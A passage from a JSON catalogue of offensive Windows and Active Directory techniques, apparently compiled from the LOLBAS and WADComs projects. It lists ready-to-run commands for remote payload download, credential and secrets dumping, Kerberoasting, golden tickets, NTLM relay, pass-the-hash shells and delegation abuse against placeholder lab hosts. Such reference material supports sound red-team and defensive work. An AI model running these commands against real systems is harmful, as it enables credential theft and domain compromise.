processes"}],"references":["https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"]},{"id":"lolbas:winfile-exe:0","toolId":"lolbas:winfile-exe","toolName":"winfile.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winfile.exe {PATH:.exe}","description":"Execute an executable file with WinFile as a parent process.","usecase":"Performs execution of specified file, can be used as a defense evasion","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"toolType":"OtherMSBinary","references":["https://github.com/microsoft/winfile","https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"]},{"id":"lolbas:xsd-exe:0","toolId":"lolbas:xsd-exe","toolName":"xsd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"xsd.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a xsd.exe command line"},{"type":"IOC","value":"xsd.exe making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"]},{"id":"wadcoms:ADCSEnumaration","toolId":"wadcoms:ADCSEnumaration","toolName":"ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"#Note that we are just enumarating here. We are not preforming exploitation. There is a linux equalivent called certipy that works much the same way\n# Find CAs \nC:Tools\\Certify.exe cas \n\n# Find templates\nC:Tools\\Certify.exe find \n\n# Find vulnerable templates\nC:Tools\\Certify.exe find /vulnerable","description":"Active Directory Certifcate Services or ADCS provide an alternative way to authenticate within a AD enviroment that contains a PKI as well as \nbeing configured with a Certifcate Authority. References below will provide technical info on ADCS as well as exploitation techniques from \nspectorops certfied preowned white paper.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion-Creds","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -u john -p password123 -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain: test.local\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"]},{"id":"wadcoms:CredDumpWithoutMimilkatz","toolId":"wadcoms:CredDumpWithoutMimilkatz","toolName":"CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"capability":[],"nativeCategory":[],"command":"# The following command will dump the SAM, SYSTEM, and SECURITY hives to the current directory.\nreg save HKLM\\SAM sam.hive\nreg save HKLM\\SYSTEM system.hive\nreg save HKLM\\SECURITY security.hive\n\n#Assuming you have transfered the hives to your kali\nsamdump2 system sam \n\n#We can also get lsa secrets via mimikatz\nlsadump::secrets /system:c:\\temp\\system.hive /security:c:\\temp\\security.hive","description":"The lsass Process while great, is no where neaar the only way to dump credintials from windows. One of which is access the three registry hives:\nSAM, SYSTEM, and SECURITY. This is a method that can be used to dump credentials without mimikatz as well as offer some potenial stealth. \n","mitre":[],"requires":["Shell","PrivEsc","Exploitation"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"]},{"id":"wadcoms:Dementor","toolId":"wadcoms:Dementor","toolName":"Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dementor.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"dementor.py interacts with the printer spooler on a host to trigger an authentication from the target IP to an attacker controlled host (usually an SMB or HTTP server). This captured authentication can then be relayed to authenticated to other hosts. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Enum4Linux-Creds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-Creds","source":"WADComs","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"enum4linux -u john -p password123 -a 10.10.10.1","description":"Enum4Linux is a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information provided valid login credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CiscoCXSecurity/enum4linux"]},{"id":"wadcoms:Enum4Linux-NoCreds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-NoCreds","source":"WADComs","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"enum4linux -a 10.10.10.1","description":"Enum4Linux is a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information using no credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"references":["https://github.com/CiscoCXSecurity/enum4linux"]},{"id":"wadcoms:Evil-WinRM-PTH","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM-PTH","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -H c23b2e293fa0d312de6f59fd6d58eae3","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Evil-WinRM supports passing the victim's NT hash for authorization.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tNT Hash: c23b2e293fa0d312de6f59fd6d58eae3\n","mitre":[],"requires":["Username","Hash"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"]},{"id":"wadcoms:Evil-WinRM","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-WinRM","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -u john -p password123","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm"]},{"id":"wadcoms:Evil-Winrm-PKINIT","toolId":"wadcoms:Evil","toolName":"Evil","name":"Evil-Winrm-PKINIT","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"evil-winrm -i 10.10.10.1 -c pub.pem -k priv.pem -S -r EVILCORP","description":"Evil-WinRM uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host. Winrm Supports PKINIT, meaning if you have a computers PFX file, you can authenticate and get a shell. Note that the command requires a public and a private key in PEM format, that can be extracted by converting the PFX to PEM format. Take a look at the references for more info on that. Password protected PFX files can be cracked with JohnTheRipper.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tPFX File: cert.pfx\n\n\tDomain: EVILCORP\n","mitre":[],"requires":["PFX"],"services":["WMI"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"]},{"id":"wadcoms:FindUncommonShares","toolId":"wadcoms:FindUncommonShares","toolName":"FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 FindUncommonShares.py -u 'john' -d 'TEST.local' -p 'password123' --dc-ip 10.10.10.1","description":"The script FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["SMB"],"references":["https://github.com/p0dalirius/FindUncommonShares"]},{"id":"wadcoms:Impacket-DCOMExec","toolId":"wadcoms:Impacket-dcomexec","toolName":"Impacket-dcomexec","name":"Impacket-DCOMExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dcomexec.py -object MMC20 test.local/john:password123@10.10.10.1","description":"Impacket's dcomexec.py provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints.\n\nCurrently supports MMC20.Application, ShellWindows, and ShellBrowserWindow DCOM objects.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDCOM Object: MMC20\n","mitre":[],"requires":["Password","Username"],"services":["DCOM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/"]},{"id":"wadcoms:Impacket-Get-GPPPassword","toolId":"wadcoms:Impacket-Get-GPPPassword","toolName":"Impacket-Get-GPPPassword","name":"Impacket-Get-GPPPassword","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Discovery"],"nativeCategory":["Exploitation","Enumeration"],"command":"python3 Get-GPPPassword.py 'TEST.local/john:password123@DC01.TEST.local' -dc-ip 10.10.10.1","description":"Python script to automatically extract and decrypt Group Policy Preferences (GPP) passwords using streams for carving files instead of mounting shares\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","Hash"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/"]},{"id":"wadcoms:Impacket-GetADUsers","toolId":"wadcoms:Impacket-GetADUsers","toolName":"Impacket-GetADUsers","name":"Impacket-GetADUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 GetADUsers.py -all test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket's GetADUsers.py will attempt to gather data about the domain's users and their corresponding email addresses.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py"]},{"id":"wadcoms:Impacket-GetNPUsers","toolId":"wadcoms:Impacket-GetNPUsers","toolName":"Impacket-GetNPUsers","name":"Impacket-GetNPUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt","description":"Impacket's GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-GetUserSPNs","toolId":"wadcoms:Impacket-GetUserSPNs","toolName":"Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetUserSPNs.py test.local/john:password123 -dc-ip 10.10.10.1 -request","description":"Impacket's GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-GoldenTicket","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-GoldenTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 john","description":"Impacket's ticketer.py can perform Golden Ticket attacks, which crafts a valid TGT ticket using a valid user's NTLM hash. It is then possible to access any service using the TGT by requesting a TGS for that service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-LookUpSID","toolId":"wadcoms:Impacket-lookupsid","toolName":"Impacket-lookupsid","name":"Impacket-LookUpSID","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 lookupsid.py test.local/john:password123@10.10.10.1","description":"Impacket's lookupsid.py performs bruteforcing of Windows SID's to identify users/groups on the remote target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/"]},{"id":"wadcoms:Impacket-NTLMRelayX-Socks","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-Socks","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -socks","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and create a socks connection to the host. In order for the SMB server to recieve credentials to relay, dementor.py or Petitpotam can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Impacket-NTLMRelayX-WPAD","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-WPAD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -t ldaps://dc.test.local -wh test-wpad --delegate-access","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command will perform WPAD spoofing to force the victim machine to authenticate to the attacker controlled host. The command will then relay the authentication to create a new computer object and grant it delegation rights to impersonate users on the victim machine. This command should be used in conjunction with mitm6.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n","mitre":[],"requires":["No_Creds"],"services":["NTLM","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"]},{"id":"wadcoms:Impacket-NTLMRelayX","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -c 'whoami /all' -debug","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and execute 'whoami /all'. In order for the SMB server to recieve credentials to relay, dementor.py can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Impacket-PsExec-PassTheTicket","toolId":"wadcoms:Impacket-psexec","toolName":"Impacket-psexec","name":"Impacket-PsExec-PassTheTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"export KRB5CCNAME=/full/path/to/john.ccache; python3 psexec.py test.local/john@10.10.10.1 -k -no-pass","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host. psexec.py also allows using Service Tickets, saved as a ccache file for Authentication. It can be obtained via Impacket's GetST.py\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n","mitre":[],"requires":["TGS","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack"]},{"id":"wadcoms:Impacket-PsExec","toolId":"wadcoms:Impacket-psexec","toolName":"Impacket-psexec","name":"Impacket-PsExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 psexec.py test.local/john:password123@10.10.10.1","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/"]},{"id":"wadcoms:Impacket-RBCD","toolId":"wadcoms:Impacket-rbcd","toolName":"Impacket-rbcd","name":"Impacket-RBCD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 rbcd.py -action write -delegate-to \"DC01$\" -delegate-from \"EVILCOMPUTER$\" -dc-ip 10.10.10.1 -hashes :A9FDFA038C4B75EBC76DC855DD74F0DA test.local/john","description":"Impacket rbcd.py will modify the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer with security descriptor of another computer.\nThe following command adds the related security descriptor of the created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of DC01.\nThis basically means that EVILCOMPUTER can get impersonated service tickets for DC01 using getST.py.\n\nCommand Reference:\n\n Target IP: 10.10.10.1\n\n Domain: test.local\n\n Username: john\n\n Hash: :A9FDFA038C4B75EBC76DC855DD74F0DA\n\n Delegate To: DC01$\n\n Delegate From: EVILCOMPUTER$\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack"]},{"id":"wadcoms:Impacket-RPCDump","toolId":"wadcoms:Impacket-rpcdump","toolName":"Impacket-rpcdump","name":"Impacket-RPCDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 rpcdump.py test.local/john:password123@10.10.10.1","description":"Impacket's rpcdump.py enumerates Remote Procedure Call (RPC) endpoints.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-Reg","toolId":"wadcoms:Impacket-reg","toolName":"Impacket-reg","name":"Impacket-Reg","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 reg.py test.local/john:password123@10.10.10.1 query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s","description":"Impacket's reg.py is a remote registry manipulation tool, providing similar functionality to reg.exe in Windows.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SAMRDump","toolId":"wadcoms:Impacket-samrdump","toolName":"Impacket-samrdump","name":"Impacket-SAMRDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 samrdump.py test.local/john:password123@10.10.10.1","description":"Impacket's samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SMBClient","toolId":"wadcoms:Impacket-smbclient","toolName":"Impacket-smbclient","name":"Impacket-SMBClient","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 smbclient.py test.local/john:password123@10.10.10.1","description":"Impacket's smbclient.py is a generic smbclient, allowing you to list shares and files, rename, upload and download files and create and delete directories.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SMBExec","toolId":"wadcoms:Impacket-smbexec","toolName":"Impacket-smbexec","name":"Impacket-SMBExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 smbexec.py test.local/john:password123@10.10.10.1","description":"Impacket's smbexec.py. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/"]},{"id":"wadcoms:Impacket-SecretsDump-NTDS","toolId":"wadcoms:Impacket-secretsdump","toolName":"Impacket-secretsdump","name":"Impacket-SecretsDump-NTDS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py -ntds C:\\Windows\\NTDS\\ntds.dit -system C:\\Windows\\System32\\Config\\system -dc-ip 10.10.10.1 test.local/john:password123@10.10.10.2","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to use the specified machines NTDS.dit and system file to extract the user account hashes associated with that machine.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.2\n\n\tDomain Controller: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"]},{"id":"wadcoms:Impacket-SecretsDump","toolId":"wadcoms:Impacket-secretsdump","toolName":"Impacket-secretsdump","name":"Impacket-SecretsDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py test.local/john:password123@10.10.10.1","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"]},{"id":"wadcoms:Impacket-Services","toolId":"wadcoms:Impacket-services","toolName":"Impacket-services","name":"Impacket-Services","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"python3 services.py test.local/john:password123@10.10.10.1 list","description":"Impacket's services.py communicates with Windows services using the MSRPC interface. It can perform many different actions on any service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAction: 